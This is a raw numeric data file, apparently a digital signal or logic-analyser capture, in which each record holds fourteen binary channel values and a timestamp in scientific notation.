0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9526400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9528800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9531600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9534000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9536400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9538800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9541200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9543600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9546400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9548800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9551600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9554000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9556400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9558800e-04 0,1,1,0,1,0,0,0,0,1,0,0,0,0,7.9559200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9559600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9561200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9563600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9566400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9568800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9571600e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9574000e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9576400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9578800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9581200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9583600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9586400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9588400e-04 0,1,1,0,1,1,0,0,0,0,0,0,0,0,7.9589200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9589600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9591600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9594000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9596400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9598800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9601200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9603600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9606400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9608400e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9611600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9614000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9616400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9618800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9621200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9623600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9626400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9628800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9631600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9634000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9636400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9638800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9641200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9643600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9646400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9648800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9651600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9654000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9656400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9658800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9661200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9663600e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9664400e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9666400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9668800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9671600e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9674000e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9676400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9678800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9681200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9683600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9686400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9688800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9691600e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9694000e-04 0,1,1,0,1,1,0,0,0,0,0,0,0,0,7.9694400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9694800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9696400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9698800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9701200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9703600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9706400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9708800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9711600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9714000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9716400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9718800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9721200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9723600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9726400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9728800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9731600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9734000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9736400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9738800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9741200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9743600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9746400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9748800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9751600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9754000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9756400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9758800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9761200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9763600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9766400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9768800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9771600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9774000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9776400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9778800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9781200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9783600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9786400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9788800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9791600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9794000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9796400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9798800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9801200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9804400e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9806800e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9809200e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9811600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9814000e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2313200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2334800e-04 1,1,1,0,1,0,0,0,0,0,0,1,0,1,9.2337200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2339600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2368400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2370800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2373200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2375600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2378000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2380400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2383200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2385600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2388400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2390800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,1,9.2393200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.2395600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2396400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2398000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2400400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2403200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2405600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2408400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2410800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2413200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2415600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2418000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2420400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2423200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2425600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2428400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2430800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2433200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2435600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2438000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2440400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2442800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2445200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2447600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2450400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2452800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2455600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2458000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2460400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2462800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2465200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2467600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2470400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2472800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2475600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2478000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2480400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2482800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2485200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2487600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2490400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2492800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2495600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2500400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2502800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2505200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2507600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2513200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2515600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2520400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2522800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2528000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2530400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2535600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2538000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2542800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2545200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2550400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2553200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2555600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2558000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2560400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2562800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2565200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2567600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2570400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2572800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2575600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2578000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2580400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2582800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2585200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2587600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2590400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2592800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2598000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2600400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2602800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2605200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2607600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2610400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2612800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2615600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2618000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2620400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2622800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2625200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2627600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2630400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2632400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2635600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2638000e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2640400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2642800e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2645200e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2647600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2650400e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2655600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2658000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2660400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2662800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2665200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2667600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2670400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2672800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2675600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2678000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2680400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2682800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2685200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2687600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2690400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2692800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2695600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2698000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2700400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2702800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2705200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2707600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2710400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2712800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2715600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2718000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2720400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2722800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2725200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2727600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2730400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2732800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2735600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2738000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2740400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2742800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2745200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2747600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2750400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2752800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2755600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2758000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2760400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2762800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2765200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2767600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2770400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2772800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2775600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2778000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2780400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2782800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2785200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2787600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2790400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2792800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2795600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2798000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2800400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2802800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2805200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2807600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2810400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2812800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2815600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2818000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2820400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2822800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2825200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2827600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2830400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2832800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2835600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2838000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2840400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2842800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2845200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2847600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2850400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2852800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2855600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2858000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2860400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2862800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2865200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2867600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2870400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2872800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2875600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2878000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2880400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2882800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2885200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2887600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2890400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2892800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2895600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2898000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2900400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2902800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2905200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2907600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2910400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2912800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2915600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2918000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2920400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2922800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2925200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2927600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2930400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2932800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2935600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2938000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2940400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2942800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2945200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2947600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2950400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2952800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2955600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2958000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2960400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2962800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2965200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2967600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2970400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2972800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2975600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2978000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2980400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2982800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2985200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2987600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2990400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2992800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.2995600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.2998000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3000400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3002800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3005200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3007600e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3010400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3012800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3015600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3018000e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3020400e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3022800e-04 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3025200e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3027600e-04 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.0550360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.0552360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0552600e-03 0,0,0,1,1,0,0,0,0,0,0,1,0,1,1.0552880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0553160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0556040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0556280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0556520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0556760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0557000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0557240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0557520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0557760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0558040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.0558280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.0558520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0558720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0558760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0559000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0559240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0559520e-03 